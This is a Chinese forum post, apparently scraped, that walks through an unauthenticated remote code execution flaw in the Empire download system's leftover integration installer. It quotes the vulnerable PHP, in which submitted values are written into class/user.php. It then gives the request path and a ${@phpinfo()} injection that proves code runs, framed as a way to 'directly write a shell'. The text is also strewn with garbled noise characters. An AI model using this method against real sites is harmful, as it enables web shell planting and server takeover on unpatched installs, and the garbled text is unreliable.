这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们/ ~; A" ^6 f# ?& D& d" e
9 P Q# m% N& E" [1 ]) @7 t
1 N& V3 @$ l" y7 c+ Q* _
这是帝国的一套下载系统 如图4 ?& N) s2 X* h1 M
ps(不需要任何账户和密码,直接写shell) 8 |- ^6 {% R. c/ K# t# W. E5 e! Z
由于很多站是由于下载要整合discuz 等等一些论坛....
7 T; A; p( U0 |+ d9 q+ Z% W
- g! k3 X+ u8 O* l9 b, Q8 L而帝国他又有一个万能接口,如图
1 r) c# T5 `8 x1 H4 b# f
0 ^* J; b/ k. Q2 g6 N& [
) c/ l) P& G: r- P$ W# b( Z% c而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码1 T5 \# I. i2 [# g) n8 A
! b8 L9 P' d& E& H; s0 T当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪7 `3 x6 \1 M4 e9 r5 E X
c8 }7 l+ F; e2 Q/ w; L6 ~& Z5 k9 R在data/fun.php中的15行4 `) c$ T+ {7 w- a
. C" g& j* J! |! Y我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {+ d9 k. K) [; t+ D8 X# K1 P
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干# `. I# b( ]. O3 N+ h) e
3 \/ e* |7 u, p9 `+ \0 b6 {这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);& B) @7 c8 H* w8 [; a8 M
8 B2 f# J! `% n1 d, h4 j他将传进来的变量进行了切割,然后赋给了$filetext$ s7 q' c, O2 W% W& t8 B! X* A
& V B* {3 D; f3 M
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了+ j0 i5 f; \+ ^6 ~
+ X3 [6 q. H3 e. {! G" e6 b! o
我们看看写入的结果,随便填一个
- l# U' b( w) `4 I3 c6 z
* C7 l0 s8 W6 R P0 C9 ?5 {; h: h( M b" Z
( ]( R4 A, w* z* N# w, M3 C1 @6 S" b- k1 a' |( U" Y
. x. l9 m* w2 X5 j% U
" v8 o4 {- E, d/ E
" ?+ w* V0 \; P' L- e
; O6 o" A* b$ Q+ Y
. b9 `) H/ j7 }. t. ?- K! t' q" e6 K& I' X! }* q
" N3 {* N$ D1 ~3 A! A/ u% `
" Y. i y! g' p& h# d! H) H
& @' ^+ X: X2 o% M7 s0 c- ~+ x3 A# w- r( E+ ^
$ u# |: p5 j Z2 L
" Y8 ^: L1 }. z1 I) s. n% _7 r5 o$ u. T) o
! {7 Y# q; a( C1 P, `1 o1 s1 [, G- T2 l4 {& J
6 C+ l/ C3 R$ x+ K; R* q; U$ U7 n4 S, i3 |" g3 P
7 q# _1 M& ~1 S# E) p, i所以我们淫荡点,写个${@phpinfo()}试试
0 Y0 P% c7 V4 m: @然后访问以下class/user.php这个文件
2 F) c# v$ ~: Y4 B6 X日了吧 : C2 i5 V6 ^! r# @
0 b' h" p5 a5 C* t
7 A* V+ I9 }+ S6 s2 R
% ~; ^) T2 z1 O# y) i
8 C5 F L, x0 T" H% \6 e/ F- E+ [7 r4 g9 `! q& Y0 i/ N7 q+ v
|